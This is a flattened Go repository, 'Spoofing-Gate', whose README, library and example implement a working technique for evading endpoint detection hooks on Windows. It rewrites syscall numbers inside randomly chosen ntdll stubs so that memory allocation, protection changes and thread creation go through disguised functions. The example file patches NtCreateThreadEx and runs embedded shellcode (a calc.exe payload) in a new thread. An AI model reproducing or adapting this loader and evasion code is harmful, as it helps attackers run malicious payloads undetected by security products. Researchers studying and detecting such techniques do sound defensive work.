├── LICENSE ├── README.md ├── example └── test-hook │ └── main.go ├── go.mod ├── go.sum └── pkg └── spfgate ├── const.go └── spfgate.go /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 TimWhite 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Spoofing-Gate 2 | (Hellsgate|Halosgate|Tartarosgate)+Spoofing-Gate. Ensures that all systemcalls go through ntdll.dll 3 | 4 | https://github.com/timwhitez/Doge-Gabh 5 | 6 | 7 | inspired by Recycled Gate 8 | 9 | https://github.com/thefLink/RecycledGate 10 | 11 | 12 | exclude apis in https://github.com/Mr-Un1k0d3r/EDRs 13 | 14 | 15 | - get sysid from "X"gate 16 | 17 | - use Spoofing-Gate to get the Spoofing funtion pointer 18 | 19 | - call the pointer 20 | 21 | - Recover 22 | 23 | ``` 24 | > .\SpfGate.exe 25 | messPtr:0x7ff91ee2e570 26 | Messed up the NTCreateThreadEx function, gl launching calc! 27 | NtAllocateVirtualMemory|(fake)NtQueryInformationTransactionManager: 0x7ff91ee2f710 28 | NtProtectVirtualMemory|(fake)NtEnumerateBootEntries: 0x7ff91ee2e910 29 | You seem to have bypassed a hooked function... congrats (sys ID is: 193) 30 | NtCreateThreadEx|(fake)NtCallbackReturn: 0x7ff91ee2ce00 31 | 32 | ``` 33 | 34 | ``` 35 | 36 | 方法使用详情: 37 | r1,e := spfgate.SpfGate(sysid,tmplist) 38 | 39 | sysid为目标api的sysid值 40 | tmplist是需要排除的api名字(部分api调用会报错或者冲突) 41 | r1为结构体 42 | 43 | type SPFG struct { 44 | Fakename string //随机api的名字 45 | Pointer uintptr //api地址 46 | Fakeid uint16 //替换后的sysid 47 | Realid uint16 //替换前的sysid 48 | } 49 | 50 | 结构体有个Recover()函数 51 | 用来恢复api的原sysid 52 | r1.Recover() 53 | 54 | 执行的时候就使用syscall执行r1.pointer 55 | 56 | 57 | ``` 58 | 59 | 60 | 61 | ``` 62 | //get sysid from "X"gate 63 | alloc,e := gabh.MemHgate(str2sha1("NtAllocateVirtualMemory"),str2sha1) 64 | if e != nil { 65 | panic(e) 66 | } 67 | 68 | var tmplist []string 69 | tmplist = append(tmplist,[]string{"NtAllocateVirtualMemory"}...) 70 | 71 | 72 | //use Spoofing-Gate to get the Spoofing funtion pointer 73 | alloctmp,e := spfgate.SpfGate(alloc,tmplist) 74 | if e != nil{ 75 | panic(e) 76 | } 77 | tmplist = append(tmplist,alloctmp.Fakename) 78 | fmt.Printf("NtAllocateVirtualMemory|(fake)") 79 | fmt.Printf(alloctmp.Fakename) 80 | fmt.Printf(": 0x%x\n",alloctmp.Pointer) 81 | 82 | //call the pointer 83 | r1, _,_ := syscall.Syscall6( 84 | alloctmp.Pointer, //ntallocatevirtualmemory 85 | 6, 86 | handle, 87 | uintptr(unsafe.Pointer(&baseA)), 88 | 0, 89 | uintptr(unsafe.Pointer(®ionsize)), 90 | uintptr(memCommit|memreserve), 91 | syscall.PAGE_READWRITE, 92 | ) 93 | if r1 != 0{ 94 | fmt.Printf("1 %x\n", r1) 95 | return 96 | } 97 | 98 | 99 | //Recover 100 | alloctmp.Recover() 101 | 102 | 103 | ``` 104 | 105 | 106 | -------------------------------------------------------------------------------- /example/test-hook/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "syscall" 6 | "unsafe" 7 | 8 | bananaphone "github.com/C-Sto/BananaPhone/pkg/BananaPhone" 9 | "github.com/timwhite/Spoofing-Gate/pkg/spfgate" 10 | "golang.org/x/sys/windows" 11 | ) 12 | 13 | var shellcode = []byte{ 14 | //calc.exe https://github.com/peterferrie/win-exec-calc-shellcode 15 | 0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66, 16 | 0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61, 17 | 0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b, 18 | 0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48, 19 | 0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x3,0x57, 20 | 0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48, 21 | 0x1,0xfe,0x8b,0x54,0x1f,0x24,0xf,0xb7,0x2c,0x17, 22 | 0x8d,0x52,0x2,0xad,0x81,0x3c,0x7,0x57,0x69,0x6e, 23 | 0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x1,0xfe, 24 | 0x8b,0x34,0xae,0x48,0x1,0xf7,0x99,0xff,0xd7,0x48, 25 | 0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59, 26 | 0x58,0xc3, 27 | } 28 | 29 | 30 | func main() { 31 | kernel32DLL := windows.NewLazySystemDLL("kernel32.dll") 32 | VirtualProtectEx := kernel32DLL.NewProc("VirtualProtectEx") 33 | 34 | bp, e := bananaphone.NewBananaPhone(bananaphone.DiskBananaPhoneMode) 35 | if e != nil { 36 | panic(e) 37 | } 38 | 39 | mess:= syscall.NewLazyDLL("ntdll.dll").NewProc("NtCreateThreadEx").Addr() 40 | //fmt.Printf("%x\n", mess) 41 | if mess == 0{ 42 | panic(fmt.Errorf("NtCreateThreadEx 获取错误")) 43 | } 44 | 45 | oldProtect := windows.PAGE_EXECUTE_READ 46 | _, _, errVirtualProtectEx := VirtualProtectEx.Call(uintptr(0xffffffffffffffff), uintptr(mess), uintptr(0x100), windows.PAGE_EXECUTE_READWRITE, uintptr(unsafe.Pointer(&oldProtect))) 47 | if errVirtualProtectEx != nil && errVirtualProtectEx.Error() != "The operation completed successfully." { 48 | //fmt.Printf("[!] Error on VirtualProtect:", errVirtualProtectEx, "\n") 49 | return 50 | } 51 | //overwrite in memory function bits to try and trigger bp to do smarts 52 | WriteMemory([]byte{0x90, 0x90, 0x4c, 0x8b, 0xd1, 0xb8, 0xc1, 0x00, 0x00, 0x00, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90}, uintptr(mess)) 53 | 54 | var tmplist []string 55 | tmplist = append(tmplist,[]string{"NtAllocateVirtualMemory","NtProtectVirtualMemory","NtCreateThreadEx"}...) 56 | 57 | //fmt.Println("Messed up the NTCreateThreadEx function, gl launching calc!") 58 | //resolve the functions and extract the syscalls 59 | alloc, e := bp.GetSysID("NtAllocateVirtualMemory") 60 | if e != nil { 61 | panic(e) 62 | } 63 | 64 | alloctmp,e := spfgate.SpfGate(alloc,tmplist) 65 | if e != nil{ 66 | panic(e) 67 | } 68 | tmplist = append(tmplist,alloctmp.Fakename) 69 | fmt.Printf("NtAllocateVirtualMemory|(fake)") 70 | fmt.Printf(alloctmp.Fakename) 71 | fmt.Printf(": 0x%x\n",alloctmp.Pointer) 72 | 73 | protect, e := bp.GetSysID("NtProtectVirtualMemory") 74 | if e != nil { 75 | panic(e) 76 | } 77 | 78 | protecttmp,e := spfgate.SpfGate(protect,tmplist) 79 | if e != nil{ 80 | panic(e) 81 | } 82 | tmplist = append(tmplist,protecttmp.Fakename) 83 | fmt.Printf("NtProtectVirtualMemory|(fake)") 84 | fmt.Printf(protecttmp.Fakename) 85 | fmt.Printf(": 0x%x\n",protecttmp.Pointer) 86 | 87 | 88 | createthread, e := bp.GetSysID("NtCreateThreadEx") 89 | if e != nil { 90 | panic(e) 91 | } 92 | 93 | createtmp,e := spfgate.SpfGate(createthread,tmplist) 94 | if e != nil{ 95 | panic(e) 96 | } 97 | fmt.Printf("You seem to have bypassed a hooked function... congrats (sys ID is: %d)\n", createtmp.Fakeid) 98 | 99 | tmplist = append(tmplist,createtmp.Fakename) 100 | fmt.Printf("NtCreateThreadEx|(fake)") 101 | fmt.Printf(createtmp.Fakename) 102 | fmt.Printf(": 0x%x\n",createtmp.Pointer) 103 | 104 | 105 | createThread(shellcode, uintptr(0xffffffffffffffff), alloctmp, protecttmp, createtmp) 106 | } 107 | 108 | 109 | func WriteMemory(inbuf []byte, destination uintptr) { 110 | for index := uint32(0); index < uint32(len(inbuf)); index++ { 111 | writePtr := unsafe.Pointer(destination + uintptr(index)) 112 | v := (*byte)(writePtr) 113 | *v = inbuf[index] 114 | } 115 | } 116 | 117 | 118 | 119 | func createThread(shellcode []byte, handle uintptr, NtAllocateVirtualMemorySysid, NtProtectVirtualMemorySysid, NtCreateThreadExSysid *spfgate.SPFG) { 120 | 121 | const ( 122 | thisThread = uintptr(0xffffffffffffffff) //special macro that says 'use this thread/process' when provided as a handle. 123 | memCommit = uintptr(0x00001000) 124 | memreserve = uintptr(0x00002000) 125 | ) 126 | 127 | var baseA uintptr 128 | regionsize := uintptr(len(shellcode)) 129 | r1, _,_ := syscall.Syscall6( 130 | NtAllocateVirtualMemorySysid.Pointer, //ntallocatevirtualmemory 131 | 6, 132 | handle, 133 | uintptr(unsafe.Pointer(&baseA)), 134 | 0, 135 | uintptr(unsafe.Pointer(®ionsize)), 136 | uintptr(memCommit|memreserve), 137 | syscall.PAGE_READWRITE, 138 | ) 139 | if r1 != 0{ 140 | fmt.Printf("1 %x\n", r1) 141 | return 142 | } 143 | NtAllocateVirtualMemorySysid.Recover() 144 | 145 | //write memory 146 | WriteMemory(shellcode, baseA) 147 | 148 | var oldprotect uintptr 149 | r1, _,_ = syscall.Syscall6( 150 | NtProtectVirtualMemorySysid.Pointer, //NtProtectVirtualMemory 151 | 5, 152 | handle, 153 | uintptr(unsafe.Pointer(&baseA)), 154 | uintptr(unsafe.Pointer(®ionsize)), 155 | syscall.PAGE_EXECUTE_READ, 156 | uintptr(unsafe.Pointer(&oldprotect)), 157 | 0, 158 | ) 159 | if r1 != 0 { 160 | fmt.Printf("2 %x\n", r1) 161 | return 162 | } 163 | NtProtectVirtualMemorySysid.Recover() 164 | 165 | var hhosthread uintptr 166 | r1,_,_ = syscall.Syscall12( 167 | NtCreateThreadExSysid.Pointer, 168 | 11,//NtCreateThreadEx 169 | uintptr(unsafe.Pointer(&hhosthread)), //hthread 170 | 0x1FFFFF, //desiredaccess 171 | 0, //objattributes 172 | handle, //processhandle 173 | baseA, //lpstartaddress 174 | 0, //lpparam 175 | uintptr(0), //createsuspended 176 | 0, //zerobits 177 | 0, //sizeofstackcommit 178 | 0, //sizeofstackreserve 179 | 0, //lpbytesbuffer 180 | 0, 181 | ) 182 | if r1 != 0 { 183 | fmt.Printf("3 %x\n", r1) 184 | return 185 | } 186 | NtCreateThreadExSysid.Recover() 187 | syscall.WaitForSingleObject(syscall.Handle(hhosthread), 0xffffffff) 188 | 189 | } 190 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/timwhite/Spoofing-Gate 2 | 3 | go 1.17 4 | 5 | require golang.org/x/sys v0.0.0-20220224120231-95c6836cb0e7 6 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | golang.org/x/sys v0.0.0-20220224120231-95c6836cb0e7 h1:BXxu8t6QN0G1uff4bzZzSkpsax8+ALqTGUtz08QrV00= 2 | golang.org/x/sys v0.0.0-20220224120231-95c6836cb0e7/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 3 | -------------------------------------------------------------------------------- /pkg/spfgate/const.go: -------------------------------------------------------------------------------- 1 | package spfgate 2 | 3 | 4 | var apiconst = []string{ 5 | "NtCommitRegistryTransaction","NtReplyWaitReceivePort","NtGetCachedSigningLevel","NtSetIntervalProfile","NtOpenSemaphore","NtExtendSection","NtFlushInstallUILanguage","NtQueryInformationWorkerFactory","NtYieldExecution","NtSecureConnectPort","NtQueryEvent","NtDebugActiveProcess","NtSinglePhaseReject","NtWriteFileGather","NtQueryInformationTransaction","NtAssignProcessToJobObject","NtQueryDebugFilterState","NtTestAlert","NtRenameTransactionManager","NtResetWriteWatch","NtSetQuotaInformationFile","NtCreateKeyedEvent","NtFlushBuffersFileEx","NtQueryInformationJobObject","NtFlushWriteBuffer","NtAllocateUserPhysicalPages","NtCreateDirectoryObjectEx","NtAcquireProcessActivityReference","NtReplyPort","NtCreateCrossVmMutant","NtQueryIntervalProfile","NtSaveKey","NtImpersonateAnonymousToken","NtOpenJobObject","NtSetSystemEnvironmentValue","NtAddAtom","NtQueryBootEntryOrder","NtReadFileScatter","NtReleaseMutant","NtCreateDebugObject","NtSetEaFile","NtThawRegistry","NtMakeTemporaryObject","NtAllocateUuids","NtCreateProfile","NtSetSystemTime","NtSaveMergedKeys","NtSetBootOptions","NtCreateWnfStateName","NtAddAtomEx","NtCreateKeyTransacted","NtInitializeRegistry","NtCreateLowBoxToken","NtQueryDirectoryObject","NtOpenKeyTransacted","NtQueryInformationTransactionManager","NtEnumerateTransactionObject","NtContinueEx","NtQuerySection","NtDeleteDriverEntry","NtWorkerFactoryWorkerReady","NtSetDefaultUILanguage","NtCreateEnclave","NtQueryObject","NtAllocateUserPhysicalPagesEx","NtQueryOpenSubKeys","NtPlugPlayControl","NtSetDefaultHardErrorPort","NtSetUuidSeed","NtAllocateLocallyUniqueId","NtCompareSigningLevels","NtSetVolumeInformationFile","NtOpenDirectoryObject","NtOpenTransactionManager","NtCallbackReturn","NtFilterTokenEx","NtCancelIoFileEx","NtDisplayString","NtRevertContainerImpersonation","NtCreateSymbolicLinkObject","NtQuerySystemEnvironmentValueEx","NtPropagationComplete","NtRollbackEnlistment","NtOpenPrivateNamespace","NtPropagationFailed","NtGetWriteWatch","NtOpenSection","NtEnumerateValueKey","NtReplyWaitReceivePortEx","NtImpersonateClientOfPort","NtCreateNamedPipeFile","NtDeleteAtom","NtRemoveProcessDebug","NtTranslateFilePath","NtQueryInformationAtom","NtIsProcessInJob","NtReleaseSemaphore","NtFlushKey","NtQuerySecurityPolicy","NtSaveKeyEx","NtDeleteWnfStateName","NtTerminateEnclave","NtQueryEaFile","NtCreateCrossVmEvent","NtQueryInformationToken","NtOpenResourceManager","NtApphelpCacheControl","NtUnlockFile","NtCreateToken","NtGetMUIRegistryInfo","NtQueryInformationEnlistment","NtCreateMailslotFile","NtUnlockVirtualMemory","NtPulseEvent","NtQueryDefaultUILanguage","NtVdmControl","NtCreateRegistryTransaction","NtCallEnclave","NtCompareObjects","NtAccessCheckByTypeAndAuditAlarm","NtRequestPort","NtQuerySymbolicLinkObject","NtClearEvent","NtCompleteConnectPort","NtQueryInformationByName","NtFilterToken","NtRaiseException","NtShutdownWorkerFactory","NtCreateWaitablePort","NtInitializeNlsFiles","NtSetLdtEntries","NtAcceptConnectPort","NtCompareTokens","NtQueryDirectoryFileEx","NtPssCaptureVaSpaceBulk","NtUpdateWnfStateData","NtCreateEventPair","NtCommitTransaction","NtDisableLastKnownGood","NtCreateJobObject","NtAccessCheckByType","NtFreezeTransactions","NtCommitComplete","NtSignalAndWaitForSingleObject","NtOpenObjectAuditAlarm","NtOpenTransaction","NtOpenEnlistment","NtSetSecurityObject","NtGetDevicePowerState","NtCreateTokenEx","NtQueryKey","NtGetCompleteWnfStateSubscription","NtFlushVirtualMemory","NtEnumerateBootEntries","NtQueryDefaultLocale","NtRegisterProtocolAddressInformation","NtGetNlsSectionPtr","NtShutdownSystem","NtPrivilegeCheck","NtAdjustGroupsToken","NtQueryLicenseValue","NtCreateEvent","NtLockVirtualMemory","NtSetCachedSigningLevel2","NtCancelSynchronousIoFile","NtRecoverTransactionManager","NtOpenEventPair","NtRecoverResourceManager","NtCreatePrivateNamespace","NtReplaceKey","NtQueryValueKey","NtInitiatePowerAction","NtFilterBootOption","NtSetCachedSigningLevel","NtEnumerateDriverEntries","NtRaiseHardError","NtNotifyChangeMultipleKeys","NtQueryMultipleValueKey","NtReadFile","NtQueryInstallUILanguage","NtCompactKeys","NtAccessCheckByTypeResultListAndAuditAlarm","NtUnloadKey2","NtSetDebugFilterState","NtWriteRequestData","NtMakePermanentObject","NtSetLowWaitHighEventPair","NtDebugContinue","NtReadRequestData","NtListenPort","NtCreateDirectoryObject","NtDeleteWnfStateData","NtGetNotificationResourceManager","NtOpenEvent","NtPrivilegedServiceAuditAlarm","NtOpenPartition","NtRecoverEnlistment","NtAdjustTokenClaimsAndDeviceGroups","NtDeleteObjectAuditAlarm","NtSetBootEntryOrder","NtFlushInstructionCache","NtQueryAuxiliaryCounterFrequency","NtRollforwardTransactionManager","NtOpenKeyTransactedEx","NtFreezeRegistry","NtInitializeEnclave","NtUnloadKey","NtSetSystemPowerState","NtReadOnlyEnlistment","NtFlushProcessWriteBuffers","NtPrePrepareEnlistment","NtCreateResourceManager","NtCreatePort","NtQueryInformationFile","NtReplyWaitReplyPort","NtLockProductActivationKeys","NtConnectPort","NtManagePartition","NtDirectGraphicsCall","NtQueryInformationPort","NtQueryWnfStateData","NtCompressKey","NtAccessCheckAndAuditAlarm","NtGetNextProcess","NtReplacePartitionUnit","NtCreateProfileEx","NtSetSystemInformation","NtSubscribeWnfStateChange","NtOpenSymbolicLinkObject","NtAllocateReserveObject","NtResetEvent","NtCancelIoFile","NtDrawText","NtManageHotPatch","NtLockRegistryKey","NtPowerInformation","NtSetDefaultLocale","NtQueryWnfStateNameInformation","NtCreatePartition","NtAccessCheckByTypeResultListAndAuditAlarmByHandle","NtPrivilegeObjectAuditAlarm","NtSetLowEventPair","NtOpenRegistryTransaction","NtQueryVolumeInformationFile","NtEnableLastKnownGood","NtReleaseWorkerFactoryWorker","NtQueryBootOptions", 6 | } 7 | 8 | -------------------------------------------------------------------------------- /pkg/spfgate/spfgate.go: -------------------------------------------------------------------------------- 1 | package spfgate 2 | 3 | import ( 4 | "crypto/sha1" 5 | "fmt" 6 | "math/rand" 7 | "sort" 8 | "time" 9 | "unsafe" 10 | 11 | "github.com/timwhitez/Doge-Gabh/pkg/Gabh" 12 | "golang.org/x/sys/windows" 13 | ) 14 | 15 | type SPFG struct { 16 | Fakename string 17 | Pointer uintptr 18 | Fakeid uint16 19 | Realid uint16 20 | } 21 | 22 | 23 | func (f *SPFG)Recover(){ 24 | var sysid uint16 25 | sysid = f.Realid 26 | windows.WriteProcessMemory(0xffffffffffffffff,f.Pointer+4,(*byte)(unsafe.Pointer(&sysid)),2,nil) 27 | } 28 | 29 | 30 | func strin(target string, str_array []string) bool { 31 | sort.Strings(str_array) 32 | index := sort.SearchStrings(str_array, target) 33 | if index < len(str_array) && str_array[index] == target { 34 | return true 35 | } 36 | return false 37 | } 38 | 39 | func str2sha1(s string) string { 40 | h := sha1.New() 41 | h.Write([]byte(s)) 42 | bs := h.Sum(nil) 43 | return fmt.Sprintf("%x", bs) 44 | } 45 | 46 | 47 | func SpfGate(sysid uint16,none []string) (*SPFG,error){ 48 | newfcg := new(SPFG) 49 | apilen := len(apiconst) 50 | newfcg.Fakeid = sysid 51 | 52 | s := rand.NewSource(time.Now().UnixNano()) 53 | r := rand.New(s) // initialize local pseudorandom generator 54 | i := 0 55 | 56 | for{ 57 | i++ 58 | idx := r.Intn(len(apiconst)) 59 | for strin(apiconst[idx],none){ 60 | idx = r.Intn(len(apiconst)) 61 | } 62 | 63 | api64,_,_ := gabh.MemFuncPtr(string([]byte{'n','t','d','l','l','.','d','l','l'}),str2sha1(apiconst[idx]),str2sha1) 64 | if api64 == 0{ 65 | if i >= apilen{ 66 | break 67 | } 68 | continue 69 | } 70 | tmpApi := uintptr(api64) 71 | 72 | if tmpApi == 0{ 73 | continue 74 | } 75 | if *(*byte)(unsafe.Pointer(tmpApi)) == 0x4c && 76 | *(*byte)(unsafe.Pointer(tmpApi+1)) == 0x8b && 77 | *(*byte)(unsafe.Pointer(tmpApi+2)) == 0xd1 && 78 | *(*byte)(unsafe.Pointer(tmpApi+3)) == 0xb8 && 79 | *(*byte)(unsafe.Pointer(tmpApi+6)) == 0x00 && 80 | *(*byte)(unsafe.Pointer(tmpApi+7)) == 0x00 { 81 | newfcg.Realid = uint16(*(*byte)(unsafe.Pointer(tmpApi+4))) | uint16(*(*byte)(unsafe.Pointer(tmpApi+5)))<<8 82 | windows.WriteProcessMemory(0xffffffffffffffff,tmpApi+4,(*byte)(unsafe.Pointer(&sysid)),2,nil) 83 | newfcg.Pointer = tmpApi 84 | newfcg.Fakename = apiconst[idx] 85 | return newfcg,nil 86 | } 87 | if i >= apilen{ 88 | break 89 | } 90 | } 91 | return newfcg,fmt.Errorf("tmpApi found Err") 92 | } 93 | --------------------------------------------------------------------------------